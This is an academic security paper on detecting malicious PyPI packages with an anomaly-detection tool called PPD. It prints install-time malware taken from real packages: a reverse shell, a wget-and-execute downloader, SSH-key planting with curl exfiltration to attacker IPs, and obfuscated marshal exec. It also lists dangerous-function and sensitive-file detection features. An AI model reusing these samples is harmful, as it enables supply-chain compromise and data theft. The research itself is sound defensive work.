Malicious Packages Lurking in User-Friendly Python Package Index

The document discusses the rise of malicious packages in the Python Package Index (PyPI) and introduces the Pip Poisoning Detector (PPD), an anomaly detection approach designed to identify suspicious and malicious packages. The authors analyzed over 228,000 packages, identifying 63 malicious and 238 suspicious ones, while significantly reducing the manual review workload. The paper highlights the effectiveness of PPD compared to existing detection methods and outlines the methodology used for package behavior analysis.


2021 IEEE 20th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom)

2021 IEEE 20th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom) | 978-1-6654-1658-0/21/$31.00 ©2021 IEEE | DOI: 10.1109/TRUSTCOM53373.2021.00091

Malicious Packages Lurking in User-Friendly Python Package Index
Genpei Liang∗, Xiangyu Zhou∗, Qingyu Wang∗, Yutong Du∗, Cheng Huang∗†
∗School of Cyber Science and Engineering, Sichuan University, Chengdu, China
† Corresponding author, Email: [email protected]

Abstract—Python has gradually become one of the most important programming languages through the development of artificial intelligence. PIP, a package management tool for Python, offers one-click installation, allowing developers to reuse other people's code to speed up development. However, any registered member can easily upload packages to the repository that stores third-party packages. Attackers use this openness to poison the package index, i.e., to publish large numbers of malicious pip packages that install backdoors, gather information, etc. To understand the state of third-party packages in the Python community ecosystem, we establish criteria for judging a package's behavior as suspicious or malicious by analyzing the code logic in disclosed malicious packages. Based on these findings, we propose and implement Pip Poisoning Detector (PPD), an approach based on anomaly detection. PPD evaluated 228,723 packages, and after human inspection, we found 63 malicious and 238 suspicious ones among the 5,699 results it output. The experimental results show that our approach is effective and can reduce the review workload by 97.51%.

Keywords—pip poisoning, anomaly detection, malicious Python

I. INTRODUCTION

In recent years, Python has grown quickly into a favorite language of software developers. According to the programming language popularity ranking published by the TIOBE website [1], Python rose from 5th position in 2015 to 3rd position in 2020, overtaking C++ and C#. Python is extremely popular among programmers, owing to the powerful Python Package Index (PyPI). PyPI is the authoritative index of all Python packages, and the accompanying repository is open to all registered members [2]. For developers, much of the reusable code a project needs has already been packaged by others, so they can use this code easily and efficiently by executing a single command (e.g., pip install request) [3]. Package Installer for Python (PIP) is an official package management tool provided by Python for downloading third-party packages from PyPI, and its installation steps are shown in Figure 1. This quick installation does improve development efficiency. But PyPI is open, which means that attackers can easily upload malicious packages to launch supply chain attacks. Such an attack targeting the PyPI ecosystem is known as pip poisoning.

The same situation is also occurring in other community ecosystems, such as Npm for Nodejs [4] and RubyGems for Ruby. However, because registries have paid little attention to such attacks, the situation has become more serious. About 20% of malicious packages have survived in the package index for more than 400 days and have been downloaded more than 1,000 times [2]. Since the discovery of this poisoning method several years ago, the number of such attacks has increased exponentially [5]. For instance, MALOSS [2] identified 339 malicious packages in August 2019 after scanning more than one million packages in NPM, PyPI, and RubyGems. Three of these malicious packages, each with more than 100,000 installations, were assigned CVE numbers. In December 2020, Tencent [6] reported that PyPI was poisoned by the malicious package covd. Attackers uploaded covd to PyPI under a name similar to the package covid. They could then compromise the infected host and perform a series of activities, such as planting Trojans and installing backdoors.

Current detection methods include detection of combosquatting and typosquatting attacks [7], metadata analysis combined with static and dynamic analysis [2], pure static analysis [8], etc. These approaches have their own advantages and disadvantages. For example, MALOSS has a high accuracy rate, but it needs to create an instance for each package it inspects, which consumes huge computing resources. In particular, it takes a lot of resources to inspect all packages across the entire community ecosystem. By manually analyzing dozens of disclosed malicious packages, we find that malicious packages behave differently from benign packages in certain respects (malicious packages usually steal personal data from users and upload it to a remote server, or download Trojans for execution, etc.). From this perspective, we propose PPD, a detection approach for pip poisoning that combines static analysis and anomaly detection.

To illustrate our approach, take as an example the malicious pip package request, which was uploaded to PyPI by attackers in July 2020 [9]. When end-users mistype the command as pip install request (correctly, pip install requests), pip automatically executes the code in setup.py (the entry file for the installation process), which downloads a Trojan from a remote server and executes it. Specifically, setup.py imports a function license_check() from another file, hmatch.py. Attackers added this function to the original file to download Trojans and install backdoors. Current approaches do not inspect this imported code; they focus only on the contents of setup.py. Our approach, PPD, uses the abstract syntax tree to parse setup.py, fetches all the imported code, and joins it into setup.py after formatting it correctly to form the complete installation code.

We mainly make the contributions as follows:

2324-9013/21/$31.00 ©2021 IEEE 606


DOI 10.1109/TrustCom53373.2021.00091
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
• After analyzing dozens of disclosed malicious pip packages, we have established preliminary criteria for judging the suspicious or malicious behavior of packages.
• We propose and implement PPD, which not only proves the feasibility of the anomaly detection concept for inspecting the entire PyPI ecosystem but also reduces the workload of manual review by 97.51%.
• We have found 301 suspicious or malicious packages in the entire PyPI ecosystem, including 63 malicious packages and 238 suspicious packages. Some of these packages still exist in PyPI.

The remainder of this paper is structured as follows. Section II provides related work. Existing threat models are presented in Section III. Section IV details the methodology and our model design. Subsequently, our results are described in Section V. We conclude this paper and provide an outlook for future work in Section VI.

Figure 1: The steps of installing a package via PIP

II. RELATED WORK

Many researchers have investigated this poisoning attack against open source libraries from several aspects.

Package name. Both Vu et al. [7] and Taylor et al. [10] have studied package names. Vu et al. determined the naming pattern of packages in PyPI, and then judged a package's suspiciousness by whether the Levenshtein distance for each pair of package names was less than or equal to a threshold value. Although this method, which relies only on package names, is fast, its lack of support from the code content makes it prone to false-positive results. Specifically, in their approach, the suspiciousness of a package depends on whether its name and its repository name are equal, so attackers can bypass this detection by creating a GitHub repository with the same name in advance. Taylor et al. conducted further experiments on Levenshtein distance and proposed six name-similarity signals (triggering any signal marks a name as similar). In addition, they added a package popularity assessment to the name similarity check, based mainly on the number of downloads. Compared with the approach proposed by Vu et al., Taylor et al.'s approach reduces false-positive results to some degree, but still does not perform a code-level analysis.

Code checking. Ohm et al. [11] focused on the iteration process of package versioning, i.e., the changes between benign and malicious versions of the same package, because the malicious version imports much extra code compared to the benign version. This is indeed a research field for package security. But for malicious packages uploaded to the repository for the first time, the code is malicious even if iterative versions exist. In this case, this solution cannot determine whether the package is malicious by comparing two different versions. Duan et al. [2] and Vu et al. [12] characterize the package in a multidimensional manner. Duan et al. systematically investigated supply chain attacks in the package manager ecosystem and proposed MALOSS, a large-scale analysis pipeline for detecting malicious packages. The MALOSS framework combines static analysis, dynamic analysis and metadata analysis, but its resource costs are high because the volume of the entire package community is rapidly increasing. MALOSS creates a container instance to analyze a single package. When it comes to inspecting the entire ecosystem, the resource costs are unacceptable (with 20 local workstations and a 60TB network-attached storage). Vu et al. detected the presence of injected code at both the file level and the code level, mainly by comparing files in a package repository (e.g., PyPI) with those in a source code repository (e.g., GitHub). However, this approach can only detect packages that have corresponding repositories, which leads to many misses.

Clustering. Different from the above, Garrett et al. [13] proposed an anomaly detection-based approach for the Npm ecosystem. This approach combined code features and metadata features to identify suspicious updates. But as it examined only a fraction of the ecosystem, the clustering is not effective. In addition, considering only package updates does reduce the cost of detection, but it is exactly what attackers who upload a malicious package for the first time hope for.

In summary, current approaches are as follows. Package name analysis methods easily produce false-positive results. Code checking approaches consume huge resources and are unsuitable for a package manager that needs to monitor the ecosystem in real time. Clustering approaches clustered and analyzed only some packages in the community, which is not effective.

III. THREAT MODEL

In this section, we mainly describe some scenarios in which users are vulnerable to attacks, as well as the suspicious and malicious behaviors of packages under our definition.

A. Main Attack Vector

Author account compromise. Package maintainers or authors occasionally reuse the same passwords across several different sites, and some third-party sites with poor security are likely to leak these passwords. Attackers can steal the author's account through social engineering, password cracking, etc. After successfully compromising an account, attackers will

distribute a version containing malicious code to end-users. An example of such an attack is eslint-scope [14], where the attacker compromised the ESLint maintainer's account and published a malicious version of eslint-scope to the package registry.

Publishing malicious packages. Attackers can easily publish packages containing malicious code to the registry because PyPI is open to registered members. Usually, attackers use names that are similar to popular packages to mislead end-users into downloading and installing their packages. Typical examples are jeIlyfish (a misspelling of jellyfish) and python3-dateutil (an imitator of the popular package dateutil) [15]. Surprisingly, jeIlyfish existed in PyPI for almost one year until it was discovered by security researchers.

Dependency confusion. Internal projects usually use standard, trusted code dependencies located in private repositories. However, if attackers create packages in public repositories that have the same names as the private, legitimate code dependencies, the malicious code can easily get into these projects [16]. Eventually, this malicious code follows these normal projects to end-users.

B. Package Behaviors

The above attack scenarios are ultimately designed to make end-users execute the malicious code, and setup.py is the file most likely to be manipulated by attackers [12]. Therefore, we categorize package behaviors as suspicious behaviors and malicious behaviors.

Suspicious behaviors. The following behaviors should be categorized as suspicious and should be verified subsequently.
• An external file (.sh or .exe) is executed in the code, and we do not care whether these executable files are malicious or not.
• Many obfuscated characters are included in the code, and we do not care whether these characters are malicious or not after de-obfuscation.
• The code downloads remote resources to the local environment and decompresses them, and we do not care whether these resources are malicious or not.
• The code reads files and then executes them, and we do not care whether the contents of these files are malicious or not.
• The code edits system configuration files or opens services privately, and we can only determine that it is suspicious.

Malicious behaviors. The following behaviors should be directly categorized as malicious.
• Make external requests to download files and then execute them. If the file is merely downloaded or executed, it can only be considered suspicious.
• Create a reverse shell. A reverse shell is hard to discover, and attackers often use it to remotely control targets.
• After reading local sensitive data, send these data to a remote server. The ultimate goal of attackers launching a series of attacks is to access the user's data.
• De-obfuscate code and then execute it. Attackers often bypass security detection through obfuscation, but to achieve their goal they must de-obfuscate and execute the code.
• Obvious malicious code or backdoors, such as deleting the current working directory, shutting down the power, etc.

IV. METHODOLOGY

Based on relevant studies, we propose a pip poisoning detection methodology based on the Levenshtein distance of package names and on features extracted from the source code. The implementation is divided into three parts: data pre-processing, feature extraction, and model training and result output, as illustrated in Figure 2. In the data pre-processing part, we split all packages into two types depending on their suffix names. The entry file for tar.gz is setup.py, while that for zip and whl is __init__.py or package-name.py (package-name means the package's name). We parse the entry file and get its imports. Then we traverse the entire package according to these imports and stitch the imported code into the entry file. After getting the complete installation code, the process enters the feature extraction part. We use the abstract syntax tree (AST) to parse the source code, accompanied by regular expressions (RegExp) to extract features. In this way, we solve the inefficiency of AST and the inaccuracy of RegExp. The complete feature set consists of code features and Levenshtein distances of package names. Then we feed this feature set to the third part, which outputs the final results after reverse cross-validation and model training. After de-duplication of these results, we obtain the packages that need manual review.

A. Data Collection and Pre-Processing

This subsection explains how to build the experiment data and extract the complete installation code.

Data collection. All the data in this paper are collected from PyPI and Tsinghua University's PyPI mirror site. First, we fetch the index file containing all package names and crawl every package's metadata according to this file. The crawling procedure uses multi-threading to speed up metadata fetching. Then we normalize the metadata of each package to extract the download link for the latest version. When all packages are downloaded, we extract setup.py from the tar.gz packages, and __init__.py or package-name.py from the zip and whl packages. Finally, we get the entry file of every package.

Pre-processing. For the entry file (e.g., setup.py for tar.gz), we first use AST to parse the file. Because this file is the entrance for the whole pip installation process, it must be parsable by AST. After traversing all the tree nodes, we pick out the Import and ImportFrom child nodes, and then get all the imports from them. Following this, we compare these imports with Python's built-in libraries to find the third-party imports. Finally, we traverse the entire package and try to find files that match these third-party imports, and then merge these files and the entry file to build the complete installation code.
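
The pre-processing step above can be sketched roughly as follows. This is a minimal illustration, not the authors' implementation: the function names third_party_imports and build_installation_code are hypothetical, sys.stdlib_module_names (available from Python 3.10) stands in for the paper's list of built-in libraries, and matching imports to files purely by file name is a simplifying assumption.

```python
import ast
import sys
from pathlib import Path


def third_party_imports(source):
    """Return top-level module names imported by `source` that are not standard library."""
    tree = ast.parse(source)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            names.add(node.module.split(".")[0])
    # Assumption: use the interpreter's own stdlib list when it is available
    # (Python 3.10+); on older versions nothing is filtered out.
    stdlib = getattr(sys, "stdlib_module_names", frozenset())
    return {name for name in names if name not in stdlib}


def build_installation_code(package_dir, entry_name="setup.py"):
    """Prepend the source of locally found imported modules to the entry file."""
    root = Path(package_dir)
    entry_source = (root / entry_name).read_text(encoding="utf-8", errors="replace")
    parts = []
    for name in sorted(third_party_imports(entry_source)):
        # Simplification: any file in the package named <import>.py counts as a match.
        for path in sorted(root.rglob(name + ".py")):
            parts.append(path.read_text(encoding="utf-8", errors="replace"))
    parts.append(entry_source)
    return "\n\n".join(parts)
```

For a package whose setup.py contains `from hmatch import license_check`, the returned text would contain the body of hmatch.py followed by setup.py itself, so later feature extraction sees the imported function as well.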

Figure 2: The structure of our methodology

B. Features Extraction

In the feature extraction part, we mainly explain the features that we have selected and the reasons for them. The features are divided into two main categories: package features and code features.

Package features. We crawl the metadata of each package in PyPI, including package name, latest upload timestamp, first upload timestamp, number of versions, README length, etc. However, the experimental results were poor, with only 50 of the 4,934 packages output being classified as suspicious or malicious after manual review. Using high-dimensional features can lead to poor model performance because some unimportant features become noise and affect the model output. Thus, we finally select only the package name's Levenshtein distance as the package feature, mainly because it can quickly detect attacks that exploit developers' misspellings. Vu et al. [7] give a Levenshtein threshold d = 2 in their research, set from the dimension of package name inconsistency. In addition, we add a similarity limit on the dimension of package name consistency and set its threshold to 0.8 (a threshold of 0.9 causes massive under-reporting).

Code features. We have analyzed the PyPI portion of the malicious package dataset collected by Ohm et al. [17]. For consistency in our analysis, we choose only the latest versions of these packages and then use them to construct our code feature set, as shown in Table I. We have mined some of the APIs that are used in these attack scenarios. As shown in Table II, we illustrate the command execution and external connection scenarios in detail. In the command execution scenario, we have divided all common dangerous functions into built-in functions (e.g., os.system()) and third-party functions (e.g., pexpect.spawn()). In the external connection scenario, we divided all libraries into built-in libraries (e.g., httplib) and third-party libraries (e.g., requests) depending on the version of the Python interpreter. In the directory traversal scenario, we detect whether some common functions that enumerate directories are called (e.g., os.walk()). In the sensitive file reading scenario, we count the paths of some configuration files under Linux and Windows (e.g., /etc/passwd, c:/windows/win.ini), and then detect whether these files are read. In the file manipulation scenario, we detect whether file IO related functions are called (e.g., f.read()). In the compression and decompression scenario, we match compression and decompression related libraries (e.g., zlib, tarfile). In the obfuscation and de-obfuscation scenario, we match obfuscation related libraries (e.g., base64). In the importing other files scenario, we get the names of third-party libraries based on the collected set of built-in libraries, and find the full code of setup.py according to these names. In the longest string scenario, we fetch the longest string in the entire code and then check if it is a base64 string. In the IP or URL scenario, we detect the presence of strings shaped like an IP or URL. In the fields of entry points scenario, we check for the presence of the auto-install section.

To summarize, during feature extraction, PPD first parses the imported contents of the installation code through AST and then checks for the presence of these dangerous functions. If AST parsing fails, RegExp is used to find them. In some feature extraction processes, such as the longest string, we use RegExp directly. For efficiency reasons, we do not use the tokens produced by AST parsing.

C. Detection Model

Algorithm. The challenge is to discover unknown malicious packages in the whole PyPI ecosystem. Since few malicious packages have been disclosed (only several dozen), we have to confront an extreme imbalance of samples (more than 250,000 packages in total). We need to find malicious samples among a large number of unlabeled samples, i.e., we need to make determinations about the packages (benign or malicious) in the PyPI ecosystem. In the distance analysis-based anomaly detection algorithm, the data is first assumed to obey a probability distribution, and then a new sample is introduced. If the probability of this sample is less than a threshold, it is determined to be an anomaly sample (malicious sample).

TABLE I: The code features we picked and why we picked them

Feature Name | Description
Command execution | Attackers often execute some system commands directly.
External connection | Attackers often send external connections to their pre-prepared servers.
Directory traversal | Attackers often obtain directory information on the target.
File manipulation | Attackers often upload, download or modify files.
Sensitive file reading | Attackers often read sensitive files on the target.
Compression and decompression | Attackers often download and decompress malicious files, or compress local files in order to send them to a remote server.
Obfuscation and de-obfuscation | Attackers often obfuscate malicious code to bypass detection and then de-obfuscate it for execution.
Importing other files | Attackers often import some external files to bypass the methodology that only detects setup.py.
The longest string | The obfuscated code is often very long.
IP or URL address | Attackers often embed their IP or URL address in malicious code.
Fields in entry points | Attackers often use entry points to execute malicious code in a covert way.

TABLE II: Specific ground-truth in feature selection

(a) Command execution
Type | Function
Built-in | os.system(), os.popen(), os.exec*(), os.spawn*(), subprocess.Popen(), subprocess.getoutput(), subprocess.getstatusoutput(), subprocess.call(), subprocess.run(), subprocess.check_call(), commands.getstatusoutput(), commands.getoutput()
3rd-party | pexpect

(b) External connection
Type | Version | Libraries
Built-in | python2.x | httplib, urllib, urllib2, socket
Built-in | python3.x | http.client, urllib, urllib3, socket
3rd-party | all version | requests, aiohttp, selenium

However, the following problems are often encountered when doing anomaly detection.

P1: When the dimensions of the features are large, a huge dataset is required. Because of the large number of packages in the PyPI ecosystem (258,426 in October 2020), we can build a huge dataset.

P2: Some samples in low-density areas will be misclassified as abnormal samples. We grouped packages with code length less than 100 characters in intervals of 10 and obtained their distribution, as shown in Figure 3. Packages with code lengths of 10 or less account for 43% of the total, and for such code we can tell at a glance whether it is malicious or not. Therefore, we excluded these packages. In addition to excluding packages with short code, we also exclude packages for which we cannot access the code, such as packages that have been withdrawn or removed by their authors.

Figure 3: Setup.py code length distribution (Unit: characters). x-axis: Code Length, in bins of 10 from 0-9 to 90-99; y-axis: Number of Packages.

P3: Pre-assumed probability distributions strongly influence model performance. We pick the Isolation Forest (iForest) algorithm [18], which has been widely used in many fields, such as docker container anomaly monitoring [19] and detection of covert data integrity assault [20]. iForest, as an unsupervised anomaly detection method, is well suited to the challenge we encountered: it is insensitive to noise or anomalies in the training data. Specifically, iForest recursively and randomly splits the dataset until all sample points are isolated. Under this random splitting strategy, the anomaly points usually have short paths. Since iForest uses segmentation to isolate anomaly points instead of excluding them by describing normal points, this almost eliminates the need to predefine the probability distribution of normal samples, which solves the third problem. But the results are still influenced to some extent by potentially malicious packages, because many malicious samples aggregated in a small sample may lead to false positives.

Reverse cross-validation. Even though we have solved almost all the problems above, relying on the iForest model alone is not enough to detect malicious packages in PyPI. When dividing the training and test sets, we cannot guarantee that there are no potentially malicious packages in the training set. To some extent, this will affect the final results. Thus, we use a method called reverse cross-validation (RCV) [21]. Taking 3-fold RCV as an example, we divide the whole dataset into three parts, with one part as the training set and the other two parts as the test set, and then perform cycle training. RCV selects only one part as the training set, which avoids false negatives caused by learning the wrong cases and improves the detection accuracy rate. But at the same time, it increases the false-positive rate due to the reduction of the training set. To improve the detection accuracy and reduce the false-positive rate, we used 3-fold, 5-fold and 10-fold RCVs to process the dataset. Finally, we de-duplicate the training output to get the final result.

V. EXPERIMENTAL

A. Results Overview

We used a local computer running Windows 10 with 16GB memory and 8 x 2.80GHz Intel CPUs to crawl the entire PyPI ecosystem in December 2020 (287,915 packages in total), but we obtained download links from the index for, and downloaded, only 228,887 packages. Part of the reason is that it takes

time for the crawler to download all packages. Between the time we record a package name and the time we download it, the author may remove or withdraw the package. The other part is that the package name exists in PyPI, but PyPI does not provide a download link for it (e.g., 01changer, 2013007-pyh, and other packages in https://pypi.org/simple/). Then we extract the complete installation code of the entry file, including the functions or imported files. After filtering out the previously mentioned packages that need to be excluded, we ran detection on the remaining 228,723 pip packages and obtained 5,699 anomaly samples after de-duplication. Through manual review, 301 packages with malicious or suspicious behavior are found (63 malicious, 238 suspicious). The distribution of the different types of malicious packages we found is shown in Figure 4.

Figure 4: Different types of malicious packages' distribution

In addition, we found two hacking tools (revshell and exp10it) in the output. These hacking tools often contain many dangerous operations such as code execution, external connections, and downloading and executing files, so they can be detected by our methodology.

B. Verification of known malicious packages

We have validated our methodology by using a dataset of 53 malicious pip packages collected by Ohm et al. [17] and several malicious packages [6], [9] disclosed by security vendors. After manually reviewing these malicious pip packages, we exclude the following types of packages:
1) No installation-related code in the package.
2) Incomplete setup.py code, which has only one function.
3) Only a screenshot of the malicious code segment, not the full code.

We extract the features of the remaining 41 malicious packages and add them to the database. These malicious packages are then run through detection together with all packages in PyPI. We verify whether the name of each malicious package appears in the results. In the end, 34 packages are detected, accounting for 82.93%. Meanwhile, we compare against the OCSVM (One-Class SVM) model, which is also an anomaly detection method. But OCSVM needs to describe the normal samples, and if the normal samples are mixed with malicious samples, its output is seriously affected. In the end, the OCSVM model detected only 11 packages, accounting for 26.82%. We categorize all detected packages by the behavioral classification in subsection III-B and analyze the most typical packages in Table III.

TABLE III: Verification of typical malicious pip packages

Package Name | Description | Hit or not
jeIlyfish | Steal sensitive files such as SSH and GPG keys and send them to the attacker's server. | yes
trustypip, pwniepip | Creating a reverse shell. | yes
request | Stealing sensitive information and digital currency keys, planting persistent backdoors, etc. | yes
libpeshka | Get the malicious script from the remote server and execute it, then persist it in .bashrc. | yes

C. Analysis of malicious packages in the wild

In this subsection, we take the malicious packages we found in the whole PyPI ecosystem as examples and explain why PPD can detect them. We have listed some of the most representative malicious pip packages and analyzed their code flow.

wormtongue. There are obvious malicious behaviors in wormtongue's code. This package creates a reverse shell to 185.238.32.160:10000 during installation, as shown in Listing 1. Other packages that conduct obviously malicious behaviors like this are fakessh, suicide, etc.

print-structures. print-structures downloads an ELF file to the local environment from a remote server, adds executable permissions to it via the command chmod, and then executes it, as shown in Listing 2. This type of attack, downloading Trojans and installing backdoors, is one of the most common. Attackers often delete the files after execution to remove traces.

protobuff. The cmdclass field in protobuff defines the class that will be instantiated when installing, and the installation of this class triggers the malicious function do_thing(), as shown in Listing 3. This function executes a series of commands to get the host information and insert the attacker's ssh public key into the ssh configuration file. Finally, all the information is uploaded to http://83.97.20.215/stats.php via curl.

Listing 1: Malicious code of wormtongue
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("185.238.32.160", 10000))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

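The install-time behaviors described above for wormtongue, print-structures and protobuff (socket connections, shell commands, and a cmdclass hook) are all visible in the syntax tree of setup.py, which suggests why static feature extraction can surface them. The following is a minimal sketch of that idea, not PPD's actual implementation: the watch list SUSPICIOUS_CALLS, the helper names dotted_name and scan_setup_source, and the harmless SAMPLE input are assumptions made for illustration. It parses the source with Python's ast module and never executes it.

```python
import ast

# Hypothetical watch list for illustration; the paper's real feature set is not reproduced here.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "os.dup2",
    "subprocess.call", "subprocess.Popen", "subprocess.run",
    "socket.socket", "eval", "exec",
}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_source(source):
    """Parse setup.py source without executing it and report risky features."""
    tree = ast.parse(source)
    hits = []
    uses_cmdclass = False
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                hits.append((node.lineno, name))
            # A cmdclass keyword registers code that runs during installation.
            if any(kw.arg == "cmdclass" for kw in node.keywords):
                uses_cmdclass = True
    return {"calls": sorted(hits), "cmdclass": uses_cmdclass}


# Harmless stand-in for a setup.py that hooks the install command.
SAMPLE = '''
import os
from setuptools import setup
from setuptools.command.install import install

class CustomInstall(install):
    def run(self):
        os.system("echo hello")
        install.run(self)

setup(name="demo", cmdclass={"install": CustomInstall})
'''

report = scan_setup_source(SAMPLE)
print(report)
```

This sketch matches only fully qualified call names, so aliased imports (for example, from os import system) would slip through, and Python 2-only syntax makes ast.parse raise SyntaxError under Python 3. A practical extractor would need to handle both cases.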
Listing 2: Malicious code of print-structures

    def run(self):
        # Download the payload, make it executable, run it in the background
        os.system('wget http://118.128.134.45:8009/getshell.elf')
        os.system('chmod +x ./getshell.elf')
        os.system('./getshell.elf &')
        # Delete the file to remove traces
        os.remove('./getshell.elf')

Listing 3: Malicious code of protobuff

    def do_thing():
        returncode = os.system("""
        {
        EXTERNAL_IP=$(curl https://ipinfo.io/ip)
        ALL_IPs=$(dnsdomainname -A)
        ALL_HOSTNAMEs=$(dnsdomainname -I)
        ALL_DOMAINs=$(grep "server_name" -ri /etc/nginx/sites-enabled/*; grep "ServerName" -ri /etc/apache2/sites-enabled/*)
        LINUX_INFO=$(uname; uname -or; lsb_release -irc)
        ENCODED_RESULT=$(echo "${USER}|||${USERNAME}|||${EXTERNAL_IP}|||${ALL_HOSTNAMEs}|||${ALL_IPs}|||${ALL_DOMAINs}|||${LINUX_INFO}" | base64)

        echo "ssh-rsa AAA... user@host" >> ~/.ssh/authorized_keys
        curl --data payload="protobuff~~~${ENCODED_RESULT}" "http://83.97.20.215/stats.php"
        }
        &> /dev/null
        """);

Listing 4: Malicious code of tst-conan

    def checkVersion():
        user_name = getpass.getuser()
        hostname = socket.gethostname()
        os_version = platform.platform()
        # Opens a UDP socket to 8.8.8.8:53 and reads the local address
        ip = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
        package = 'tstconan'
        vid = user_name + "###" + hostname + "###" + os_version + "###" + ip + "###" + package
        request.urlopen(r'http://139.199.57.156/tst.php', data='vid='.encode('utf-8') + base64.b64encode(vid.encode('utf-8')))

Listing 5: Malicious code of reque6t

    def telemetry(is_sudo, sender, original_name, new_name):
        url = "http://mf2pru.ceye.io"
        data = encoder(dict(
            is_sudo=is_sudo,
            sender=sender,
            original_name=original_name,
            new_name=new_name,
            version=sys.version
        ))
        request(url, encode(data), timeout=0.1)

Listing 6: Malicious code of afgcrk

    # Python 2 syntax; elided values (...) are as printed in the original listing
    exec marshal.loads('c\x00...\x0c\x01')
    z = [168, 171...,214, 222]
    _ = [103, 66...,4, 34]
    __ = [927..., 927]
    OoO_ = [45, 42...,39, 41]
    exec marshal.loads('c\x00...\x0c\x01')
    OO = lambda _ : marshal.loads(_)
    u = (({}<())-({}<()))
    p = (({}<())-({}<()));v = []
    exec((lambda:((()>())+(()<()))).func_code.co_lnotab).join(map(chr,[(....])))
    exec OO("".join([chr(i) for i in lx]).decode("hex"))

tst-conan. tst-conan first fetches the username, hostname, system version and other information, then determines whether the operating system is Windows or Linux, and gets the system language. Finally, it obtains the host's IP address by opening a UDP socket to the DNS server 8.8.8.8 (port 53) and merges it with the information obtained earlier before sending it to http://139.199.57.156/tst.php, as shown in Listing 4. Malicious packages similar to tst-conan and disclosed by Ohm et al. [17] include PyYAML, pythom-mysql, python-openssl, etc.

reque6t. reque6t is a malicious package released into the PyPI ecosystem by security researchers; we also found the similar packages r-quest, req-est, etc. The setup.py code of this package first tries to create a file called pwn3d.txt in the root directory to determine whether it has root privileges. Then it sends information about whether it is running with high privileges, the package name, the package manager, etc. to http://mf2pru.ceye.io, as shown in Listing 5. Finally, it also tries to read /etc/passwd.

afgcrk. afgcrk loads Python code objects via marshal and then performs malicious actions after obfuscation using lambda functions. Packages such as crkpak, crkpk, etc. are similar. Although the specific implementations differ, the behavior of these malicious pip packages is to load a Python code object and execute it. The code is shown in Listing 6.

D. Discussion

Our approach can help PyPI package managers reduce the cost of manual review to some extent. We reduce the number of packages to be inspected from 228,723 to 5,699. If the entire PyPI ecosystem is to be inspected, our approach reduces the work by 97.51%. In terms of results, our approach is effective for fully functional malicious pip packages. After analysis, however, we found that it does not work well for detecting some malicious PyPI packages with little functionality, such as 00000a. This package uses only one external connection and one ls command.

In addition, during our manual review of the 301 packages in the output, we noticed that 81 of the 238 suspicious packages read files and execute them, while 77 packages download files. Although these packages execute seemingly normal files like version.py, reading files and executing them should not be allowed, because end-users cannot determine whether these files are required for the installation or were carefully forged by an attacker. As for file downloads, third-party packages should ship complete code and should not need to download anything else in the background. This behavior should also be disallowed because end-users have no way to ensure that the downloaded files are safe. The two cases mentioned above are the most frequent ones, and we call on PyPI officials to standardize the format of the setup.py file to disable silent background downloads and other dangerous operations. A reasonable approach would be to leave these operations to the users instead of the third-party packages.
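The two behaviors singled out above, reading a file and executing it, and downloading files during installation, can also be flagged statically. The sketch below is one possible check under stated assumptions, not the method used in this paper: the function names, the DOWNLOAD_CALLS list, and the SAMPLE input (including the example.invalid URL) are hypothetical. It recognizes only the direct form exec(open(...).read()) and calls whose final name is urlopen or urlretrieve.

```python
import ast

# Assumed indicator names, chosen for illustration only.
DOWNLOAD_CALLS = {"urlopen", "urlretrieve"}


def call_name(node):
    """Last component of the called name, e.g. 'urlopen' for request.urlopen(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return None


def contains_open_call(node):
    """True if a call to open() appears anywhere inside the given subtree."""
    return any(
        isinstance(sub, ast.Call) and call_name(sub) == "open"
        for sub in ast.walk(node)
    )


def find_install_time_risks(source):
    """Return sorted (line, kind) pairs for read-and-execute and download patterns."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = call_name(node)
        if name in ("exec", "eval") and any(contains_open_call(a) for a in node.args):
            findings.append((node.lineno, "read-and-execute"))
        elif name in DOWNLOAD_CALLS:
            findings.append((node.lineno, "download"))
    return sorted(findings)


# Hypothetical setup.py fragment; it is parsed, never executed.
SAMPLE = '''
from urllib import request
exec(open("version.py").read())
request.urlopen("https://example.invalid/extra.dat")
'''

for line, kind in find_install_time_risks(SAMPLE):
    print(line, kind)
```

A check this narrow misses indirect forms, such as reading the file into a variable first and calling exec on it later, so it would serve as one feature among several rather than as a verdict.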

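The percentages quoted in this evaluation follow directly from the reported counts. As a quick check, the arithmetic can be reproduced as below. The helper name percent and the variable names are illustrative, and the share of flagged samples confirmed by manual review is derived here from the reported figures rather than stated in the text.

```python
def percent(part, whole):
    """Return part/whole as a percentage rounded to two decimals."""
    return round(100.0 * part / whole, 2)


total_packages = 228_723   # pip packages analyzed
flagged = 5_699            # anomaly samples after de-duplication
confirmed = 301            # malicious or suspicious after manual review

# Share of packages that no longer need manual inspection.
workload_reduction = percent(total_packages - flagged, total_packages)

# Known malicious packages: 34 detected out of the 41 that remained after exclusion.
detection_rate = percent(34, 41)

# Derived figure: fraction of flagged samples that manual review confirmed.
confirmed_share = percent(confirmed, flagged)

print(workload_reduction, detection_rate, confirmed_share)
```

The first two values reproduce the 97.51% workload reduction and the 82.93% detection rate reported above.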
VI. CONCLUSIONS AND FUTURE WORK

A. Conclusions

